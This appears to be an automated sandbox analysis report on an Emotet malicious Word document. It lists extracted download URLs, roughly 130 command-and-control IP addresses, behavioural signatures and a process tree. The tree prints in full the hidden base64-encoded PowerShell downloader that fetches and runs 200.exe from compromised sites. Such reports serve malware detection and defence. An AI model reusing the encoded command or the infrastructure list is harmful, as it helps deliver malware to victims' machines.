Analysis
- max time kernel: 28s
- resource: win10v191014
- submitted: 14-01-2020 23:27
Malware Config
Extracted
http://farsmix.com/wp-admin/xpk881/
http://thuong.bidiworks.com/wp-content/q2TO1988/
https://securiteordi.com/wofk253jeksed/QO485/
http://ziyinshedege.com/wp-content/TIGc/
http://luilao.com/yakattack/EmXdYs3Rf/
Extracted
emotet
70.184.69.146:80
186.177.165.196:443
139.47.135.215:80
192.241.143.52:8080
159.65.241.220:8080
45.79.95.107:443
69.163.33.84:8080
177.34.142.163:80
200.123.183.137:443
2.47.112.72:80
190.17.44.48:80
187.54.225.76:80
190.219.149.236:80
190.100.153.162:443
58.171.38.26:80
91.205.215.57:7080
152.231.89.226:80
94.176.234.118:443
201.213.100.141:8080
203.25.159.3:8080
110.142.161.90:443
46.101.212.195:8080
178.79.163.131:8080
151.80.142.33:80
79.7.158.208:80
191.183.21.190:80
188.216.24.204:80
113.190.254.245:80
87.106.46.107:8080
120.150.247.164:80
80.11.158.65:8080
203.130.0.69:80
50.28.51.143:8080
129.205.201.163:80
149.62.173.247:8080
177.242.21.126:80
200.45.187.90:80
77.55.211.77:8080
190.210.236.139:80
202.62.39.111:80
138.68.106.4:7080
2.45.112.134:80
83.165.78.227:80
76.69.26.71:80
207.154.204.40:8080
212.71.237.140:8080
58.162.218.151:80
189.201.197.98:8080
68.187.160.28:443
190.151.5.130:443
151.231.7.154:80
91.83.93.124:7080
200.58.83.179:80
187.188.166.192:8080
96.61.113.203:80
72.29.55.174:80
181.30.61.163:443
94.200.114.162:80
190.191.82.216:80
200.82.170.231:80
97.120.32.227:80
186.15.52.123:80
89.211.114.203:80
188.135.15.49:80
86.42.166.147:80
204.225.249.100:7080
45.8.136.201:80
37.187.6.63:8080
190.195.129.227:8090
192.241.146.84:8080
68.174.15.223:80
200.55.53.7:80
79.7.114.1:80
91.74.175.46:80
85.105.241.192:80
181.129.96.162:990
181.10.204.106:80
110.170.65.146:80
181.29.101.13:8080
189.26.118.194:80
188.218.104.226:80
104.131.58.132:8080
217.199.160.224:8080
139.162.118.88:8080
113.61.76.239:80
118.36.70.245:80
93.144.226.57:80
87.106.77.40:7080
186.68.48.204:443
142.93.114.137:8080
181.36.42.205:443
181.30.61.163:80
46.28.111.142:7080
181.167.96.215:80
94.200.126.42:80
86.123.138.76:80
14.201.35.38:80
179.208.84.218:8080
5.196.35.138:7080
216.251.83.79:80
68.183.170.114:8080
2.42.173.240:80
91.117.159.233:80
165.228.195.93:80
59.120.5.154:80
114.109.179.60:80
99.252.27.6:80
45.73.157.243:8080
185.94.252.12:80
119.59.124.163:8080
62.15.36.103:443
185.160.212.3:80
62.75.143.100:7080
185.86.148.222:8080
191.103.76.34:443
172.104.169.32:8080
181.231.220.232:80
82.196.15.205:8080
81.16.1.45:80
62.75.160.178:8080
109.169.86.13:8080
81.213.78.151:443
189.19.81.181:443
190.186.164.23:80
185.160.229.26:80
68.183.190.199:8080
190.210.184.138:995
Signatures
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes: powershell.exe, 200.exe, malertserial.exe
description | pid | process | target process
PID 3704 wrote to memory of 4540 | 3704 | powershell.exe | 200.exe
PID 4540 wrote to memory of 4512 | 4540 | 200.exe | 200.exe
PID 4372 wrote to memory of 4332 | 4372 | malertserial.exe | malertserial.exe
-
Drops file in System32 directory 1 IoCs
Processes: 200.exe
description | ioc | process
File renamed | C:\Users\Admin\200.exe => C:\Windows\SysWOW64\malertserial.exe | 200.exe
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes: WINWORD.EXE
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
-
Suspicious use of SetWindowsHookEx 5 IoCs
Processes: WINWORD.EXE, 200.exe, 200.exe, malertserial.exe, malertserial.exe
pid | process
5096 | WINWORD.EXE
4540 | 200.exe
4512 | 200.exe
4372 | malertserial.exe
4332 | malertserial.exe
-
Process spawned unexpected child process 1 IoCs
Processes: powershell.exe
description | pid | pid_target | process | target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 3704 | 3760 | powershell.exe |
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes: powershell.exe
description | pid | process
Token: SeDebugPrivilege | 3704 | powershell.exe
-
Suspicious behavior: EmotetMutantsSpam 2 IoCs
Processes: 200.exe, malertserial.exe
pid | process
4512 | 200.exe
4332 | malertserial.exe
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes: WINWORD.EXE
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes: WINWORD.EXE
pid | process
5096 | WINWORD.EXE
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes: powershell.exe
pid | process
3704 | powershell.exe
-
Executes dropped EXE 4 IoCs
Processes: 200.exe, 200.exe, malertserial.exe, malertserial.exe
pid | process
4540 | 200.exe
4512 | 200.exe
4372 | malertserial.exe
4332 | malertserial.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE (process tree level 1)
Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\cf9b2af087793eebd071ffaf8de083dd96691178a2a07f9ed5b28fcbae262484.doc" /o ""
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (process tree level 1)
Command line: powershell -w hidden -en JABXAHoAcgBtAGEAbAB4AHUAeABxAD0AJwBRAGwAZgBjAGgAYgB0AG8AdwBxACcAOwAkAFEAdQBvAG4AaQByAGwAaQBqACAAPQAgACcAMgAwADAAJwA7ACQAQQBvAGwAaQBnAHcAcwBlAHYAcgBlAD0AJwBVAGMAZABwAG8AbwBlAGkAeABjAGMAbwBlACcAOwAkAEUAYgBpAGUAbgBkAGwAbAB2AG8AYgBqAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABRAHUAbwBuAGkAcgBsAGkAagArACcALgBlAHgAZQAnADsAJABQAG0AZgB1AG4AeABhAHcAbQBtAHEAPQAnAEkAdgB1AGIAaQBpAGcAcgBrAGgAYgBxACcAOwAkAEQAZgByAHQAcQB5AGoAbQB2AD0ALgAoACcAbgBlAHcAJwArACcALQBvAGIAagBlAGMAJwArACcAdAAnACkAIABOAEUAVAAuAFcAZQBCAEMATABpAEUATgB0ADsAJABSAHUAcAB2AG0AdQB2AHkAagBvAHMAPQAnAGgAdAB0AHAAOgAvAC8AZgBhAHIAcwBtAGkAeAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AeABwAGsAOAA4ADEALwAqAGgAdAB0AHAAOgAvAC8AdABoAHUAbwBuAGcALgBiAGkAZABpAHcAbwByAGsAcwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHEAMgBUAE8AMQA5ADgAOAAvACoAaAB0AHQAcABzADoALwAvAHMAZQBjAHUAcgBpAHQAZQBvAHIAZABpAC4AYwBvAG0ALwB3AG8AZgBrADIANQAzAGoAZQBrAHMAZQBkAC8AUQBPADQAOAA1AC8AKgBoAHQAdABwADoALwAvAHoAaQB5AGkAbgBzAGgAZQBkAGUAZwBlAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AVABJAEcAYwAvACoAaAB0AHQAcAA6AC8ALwBsAHUAaQBsAGEAbwAuAGMAbwBtAC8AeQBhAGsAYQB0AHQAYQBjAGsALwBFAG0AWABkAFkAcwAzAFIAZgAvACcALgAiAHMAUABsAGAAaQB0ACIAKAAnACoAJwApADsAJABEAG0AaQB1AGMAbwBjAG8AaQA9ACcARwBhAHUAZgByAGMAeQB1AGwAegAnADsAZgBvAHIAZQBhAGMAaAAoACQAUQBnAGMAawB1AGoAbwBjAHQAIABpAG4AIAAkAFIAdQBwAHYAbQB1AHYAeQBqAG8AcwApAHsAdAByAHkAewAkAEQAZgByAHQAcQB5AGoAbQB2AC4AIgBkAG8AVwBuAEwAbwBgAEEARABgAEYASQBMAGUAIgAoACQAUQBnAGMAawB1AGoAbwBjAHQALAAgACQARQBiAGkAZQBuAGQAbABsAHYAbwBiAGoAKQA7ACQAQgBmAHYAYgB4AGUAZQBlAGUAPQAnAFgAawBkAHMAbgBnAHEAdABuAGoAcgAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAEUAYgBpAGUAbgBkAGwAbAB2AG8AYgBqACkALgAiAGwARQBOAEcAYABUAGgAIgAgAC0AZwBlACAAMgAxADMANAA3ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAdABgAEEAcgB0ACIAKAAkAEUAYgBpAGUAbgBkAGwAbAB2AG8AYgBqACkAOwAkAE0AdABmAGQAdgBvAGgAYwBlAGgAPQAnAE0AZQBqAGUAZwBmAHQAawB4ACcAOwBiAHIAZQBhAGsAOwAkAEsAawBvAHUAZwBuAHkAagBkAG8AcAA9ACcAWgBiAGkAeQBqAHUAZgB2AGQAZwAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABKAGkAYwBsAGgAeABvAHEAZgB2AD0AJwBVAGEAbwBmAHkAbAB0AHcAcwAnAA==
- Suspicious use of WriteProcessMemory
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\200.exe (process tree level 2)
Command line: "C:\Users\Admin\200.exe"
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
-
C:\Users\Admin\200.exe (process tree level 3)
Command line: --c4bc2c90
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EmotetMutantsSpam
- Executes dropped EXE
-
C:\Windows\SysWOW64\malertserial.exe (process tree level 1)
Command line: "C:\Windows\SysWOW64\malertserial.exe"
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
-
C:\Windows\SysWOW64\malertserial.exe (process tree level 2)
Command line: --26dbb0b5
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EmotetMutantsSpam
- Executes dropped EXE
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\ProgramData\Microsoft\Crypto\RSA\S-1-5-18\403f0cc78adafaecdb503a6c6424923d_293fa5bd-edfb-4bba-800e-a7dce3ea3438
-
C:\Users\Admin\200.exe
-
C:\Users\Admin\200.exe
-
C:\Users\Admin\200.exe
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-634046074-2673730973-2644684987-1000\0f5007522459c86e95ffcc62f32308f1_293fa5bd-edfb-4bba-800e-a7dce3ea3438
-
C:\Windows\SysWOW64\malertserial.exe
-
C:\Windows\SysWOW64\malertserial.exe
-
memory/4332-17-0x0000000000D50000-0x0000000000D67000-memory.dmp (Filesize 92KB)
-
memory/4332-18-0x0000000000400000-0x000000000046E000-memory.dmp (Filesize 440KB)
-
memory/4372-14-0x00000000006C0000-0x00000000006D7000-memory.dmp (Filesize 92KB)
-
memory/4512-12-0x0000000000400000-0x000000000046E000-memory.dmp (Filesize 440KB)
-
memory/4512-11-0x0000000002090000-0x00000000020A7000-memory.dmp (Filesize 92KB)
-
memory/4540-8-0x00000000021E0000-0x00000000021F7000-memory.dmp (Filesize 92KB)